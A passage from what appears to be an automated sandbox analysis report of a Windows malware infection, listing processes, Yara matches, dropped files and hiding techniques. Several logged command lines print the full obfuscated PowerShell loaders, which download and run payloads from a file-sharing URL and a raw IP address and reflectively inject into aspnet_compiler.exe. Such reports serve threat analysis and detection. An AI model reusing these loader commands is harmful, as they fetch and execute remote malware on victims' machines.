29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'|'))"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'|'))"Jump to behavior
                Source: Yara matchFile source: 9.2.powershell.exe.660c250.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.powershell.exe.660c250.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5536, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 3092, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.cmdline"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.cmdline"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00803DA5 push eax; iretd 9_2_00803DB9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_06F12AEE push dword ptr [ebp+ebx-75h]; iretd 9_2_06F12AF4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00402AC0 push eax; ret 11_2_00402AD4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00402AC0 push eax; ret 11_2_00402AFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile created: C:\Users\user\AppData\Roaming\188E93\31437F.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.dllJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
